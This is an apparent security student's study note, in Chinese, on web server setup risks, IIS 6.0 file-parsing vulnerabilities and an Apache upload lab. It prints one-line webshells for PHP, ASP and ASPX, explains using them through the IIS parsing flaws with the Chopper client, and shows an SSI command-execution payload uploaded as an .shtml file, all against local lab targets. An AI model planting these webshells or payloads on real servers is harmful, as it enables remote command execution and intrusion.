xdaq day3

day3基础入门—搭建安全拓展

==涉及知识:==

  • 常见搭建平台脚本启用
  • 域名IP目录解析安全问题
  • 常见文件后缀解析对应安全
  • 常见安全测试中的安全防护
  • WEB后门与用户及文件权限

ASP,PHP,ASPX,JSP,PY,JAVAWEB等环境

WEB源码中敏感文件
后台路径,数据库配置文件,备份文件等

IP或域名解析WEB源码目录对应下存在的安全问题
域名访问,IP访问(结合类似备份文件目录)
IP访问可以扫描到根目录,而域名访问就是在指定的项目目录

脚本后缀对应解析(其他格式可相同-上传安全)
存在下载或解析问题

常见防护中的IP验证,域名验证等

后门是否给予执行权限
后门是否给予操作目录或文件权限
后门是否给予其他用户权限


IIS解析漏洞

IIS在解析文件时存在以下两个解析漏洞

1、当建立*.asp*.asa格式的文件夹时其目录下任意文件都会被iis当作asp文件来解析
2、当文件为*.asp;1.jpg时IIS6.0同样会以ASP脚本来执行
IIS解析漏洞利用:
太旧了(来自2023.10.3的吐槽)
  1. 在wwwroot文件夹下建立一个test.asp文件夹,文件夹里面添加一个ma.asp

    iisasp1

    iisasp2

通过127.0.0.1/test.asp/ma.jpg访问 把改地址放到菜刀里面成功进入

iisasp3

  1. 在wwwroot文件下建一个ma.asp;.jpg文件,里面写一句话木马

iisasp4

再通过127.0.0.1/ma.asp;.jpg访问 添加到菜刀

其余漏洞见https://www.cnblogs.com/secevery/p/5804504.html

php的一句话木马:

<?php @eval($_POST['pass']);?>

asp的一句话是:

<%eval request ("pass")%>

aspx的一句话是:

<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

搭建靶场

ubuntu1

因为某种原因下载失败,需要把下载后缀改为git(2023.10.3修改)

tomcat弱口令测试,由于找不到合适的jsp大马,暂告一段落

靶场—apache上传测试

需要 Ubuntu搭建的漏洞环境、burp、firefox浏览器代理

  1. 在靶场编译并运行环境

apache1

  1. 访问环境

apache2

  1. 测试服务器类型 以及尝试上传普通文件

apache3

  1. 上传一个后缀名.shtml的文件
<!--#exec cmd="ls" -->

shtml是包含有嵌入式服务器方包含命令的HTML(标准通用标记语言下的一个应用)文本。在被传送给浏览器之前,服务器会对SHTML文档进行完全地读取、分析以及修改。   shtml是一种用于SSI技术的文件——Server Side Include–SSI。Shtml也是网页文件,但它是服务器动态产生的静态网页,需要服务器自带SSI处理出来静态网页,通常有shtml和shtm两个扩展名。   shtml和asp有一些相似,以shtml命名的文件里,使用了ssi的一些指令,就像asp中的指令,你可以在SHTML文件中写入SSI指令,当客户端访问这些shtml文件时,服务器端会把这些SHTML文件进行读取和解释,把SHTML文件中包含的SSI指令解释出来。因为包含 SSI 指令的文件要求特殊处理,所以必须为所有 SSI 文件赋予 SSI 文件扩展名。默认扩展名是 .stm、。shtm 和 .shtml。可以用浏览器和一些文本编辑工具打开。

  1. 放行结果为成功

apache4

  1. 查看域名下的shtml文件

apache5

测试完成

关闭环境

docker-compose down
© 2022 - 2024 PWN022. All rights reserved.
载入天数...载入时分秒...